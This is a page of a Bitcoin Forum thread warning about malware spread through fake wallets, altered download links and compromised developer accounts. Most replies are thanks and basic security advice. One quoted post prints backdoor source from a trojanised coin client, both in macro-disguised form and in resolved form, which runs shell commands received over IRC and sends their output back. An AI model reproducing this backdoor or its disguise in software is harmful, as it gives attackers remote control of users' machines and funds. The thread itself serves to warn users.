Bitcoin Forum
October 21, 2019, 03:43:29 AM *
News: 10th anniversary art contest
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 164277 times)
CryptoRyuzaki
Newbie
*
Offline Offline

Activity: 51
Merit: 0


View Profile WWW
February 21, 2018, 01:17:06 AM
 #461

Thanks for sharing the different malware attack/attempts. One needs to be extra vigilant whenever clicking on any unknown links and have the anti-virus software up to date. These two primary items will help you more than 90% of the time to avoid any infections.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1571629409
Hero Member
*
Offline Offline

Posts: 1571629409

View Profile Personal Message (Offline)

Ignore
1571629409
Reply with quote  #2

1571629409
Report to moderator
bedford1972
Jr. Member
*
Offline Offline

Activity: 266
Merit: 2


View Profile
February 21, 2018, 10:39:50 PM
 #462

Good post, very cognitive. But I would add here recommendations how to minimize the risks of infection. For example, to create a separate computer for work on the network and separately for wallets. This will help at least keep the funds stored for a long time. I will also recommend using the Tabsbook program, in which you can save frequently used links and go only for them, since attackers often use official resources and make phishing sites. There are a bunch of other recommendations that I advise you to study before you start working with a crypto currency.

QUARKCHAIN - Blockchain Sharding Technology
IS A FLEXIBLE, SCALABLE, AND USER-ORIENTED BLOCKCHAIN INFRASTRUCTURE. (https://quarkchain.io)
sportcoins
Newbie
*
Offline Offline

Activity: 1
Merit: 0


View Profile
February 23, 2018, 04:38:47 AM
 #463

Thanks for the information. We hate Malware!
hashcoinusa
Member
**
Offline Offline

Activity: 344
Merit: 10


View Profile
February 26, 2018, 06:03:20 AM
 #464


We will never have the insight into the code.   

Dont installed wallet on your main computer. Create a virtual machine and limit your exposure.

robi5060
Newbie
*
Offline Offline

Activity: 68
Merit: 0


View Profile
February 26, 2018, 02:57:41 PM
 #465

Can anyone please told me about what coin's are effected by sophisticated attacks/ malware.
Nanoverso
Jr. Member
*
Offline Offline

Activity: 81
Merit: 1


View Profile WWW
February 26, 2018, 11:24:41 PM
Last edit: May 16, 2019, 04:50:20 AM by Nanoverso
 #466

Some information if these malware infection attempts are affecting other systems beyond Windows, like Mac or Linux?

Checkout my Mario blog (Portuguese): Jogos do Mario Bros.
Dandidada
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
February 28, 2018, 08:18:18 AM
 #467

Thank y'all for the enlightenment..it's very much appreciated, knowing fully well there are lots of hacker trying to get easy crypto currency
prsharma
Newbie
*
Offline Offline

Activity: 33
Merit: 0


View Profile
February 28, 2018, 09:54:48 AM
 #468

Very userful information for me, I never thought in mind that attackers might attack on this forum and post some malicious content here.
thanks for info I will be cautious about content and links before click on it.
Motookerva
Newbie
*
Offline Offline

Activity: 63
Merit: 0


View Profile
March 01, 2018, 06:46:55 PM
 #469

I am newbie and thanks for informing. I would like to ask how can we spot a scammer?
Marble777
Member
**
Offline Offline

Activity: 479
Merit: 10

The World's 1st Waste to Green Energy DLT Project


View Profile
March 01, 2018, 10:12:06 PM
 #470

Very userful information for me, I never thought in mind that attackers might attack on this forum and post some malicious content here.
thanks for info I will be cautious about content and links before click on it.
it applies also to me because I am a beginner so I do not understand about this forum and sometimes feel paranoid when heard there are many cases of pishing but after reading the above information I really understand da sure that this forum is safe from hackers

━━ ━     Whitepaper     ━ ━━ ━     E M J A C     ━ ━━ ━     One Pager     ━ ━━
●     ●         ●     The World’s 1st Green Renewable Energy DLT Project     ●         ●     ●
━ ━━━ ━      IEO on  Exmarkets & p2pb2b      ━ ━━━ ━      Telegram      ━ ━━━ ━
seggardinggins
Full Member
***
Offline Offline

Activity: 630
Merit: 100



View Profile
March 02, 2018, 09:34:02 PM
 #471

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?
Maybe so but all the tools that are used as much as possible are only used for this purpose in my opinion would be too risky if the tool we use to open the wallet that we use also for other purposes such as games and download mp3 or video because We all know that many malware in most download link

jaydoes6
Newbie
*
Offline Offline

Activity: 24
Merit: 0


View Profile
March 03, 2018, 05:32:27 AM
 #472

Cant you give anything new? It was prevailing from a very old times in btcs
gng
Newbie
*
Offline Offline

Activity: 210
Merit: 0


View Profile
March 03, 2018, 07:56:14 AM
 #473

you think faucet sites send malware ?
AutumnSphinx
Newbie
*
Offline Offline

Activity: 4
Merit: 0


View Profile
March 03, 2018, 11:18:29 PM
 #474

This is very informative especially to newbies like me. Thank you. Reading all the threads. I need to add security measures.
Ant112990
Newbie
*
Offline Offline

Activity: 21
Merit: 0


View Profile
March 04, 2018, 04:29:50 AM
 #475

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Don't forget airship registration, asking for private keys.. I sent them mones and luckily found out immediately after I sent it.. and move my coin out the wallet and created a new wallet.
bekhuong45
Newbie
*
Offline Offline

Activity: 126
Merit: 0


View Profile
March 04, 2018, 10:32:03 AM
 #476

we need say thanks U.. Smiley) clap clpap
Magister Magus
Member
**
Offline Offline

Activity: 329
Merit: 35


View Profile
March 04, 2018, 10:44:19 AM
 #477

Thank you very much for your precious info; I'm really stunned, as I never thought there were so many ways to be scammed Sad

Your post made me to think in a paranoid way, and I just wondered if we can really trust antimalware softwares: how can we be sure that THEY don't put something malicious, or don't scan for private keys?

It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.

▂▂▃▅▇ EVO - THE WORLD OF SELF-DEVELOPMENT ▇▅▃▂▂
MEDIUM    ●  LINKEDIN  ●TELEGRAM ◄  Blockchain platform for assessing and developing human skills  ▶ TWITTER  ● FACEBOOK  ●
WHITEPAPER
rammanbl4
Full Member
***
Offline Offline

Activity: 252
Merit: 100



View Profile
March 04, 2018, 03:35:43 PM
 #478

This is terrible, I really thank you, because I almost caught, and now I start to install Adblock, I hope to block all the malwares from online websites.
redshiftexpensive
Newbie
*
Offline Offline

Activity: 69
Merit: 0


View Profile
March 05, 2018, 03:11:51 AM
 #479

Yes I was totally aware of it
cp3mc
Newbie
*
Offline Offline

Activity: 34
Merit: 0


View Profile
March 05, 2018, 11:19:46 AM
 #480

I was thinking if there is way to automatic delete any Malware link post on this forum so that we may not even get to open the link.
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 »
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!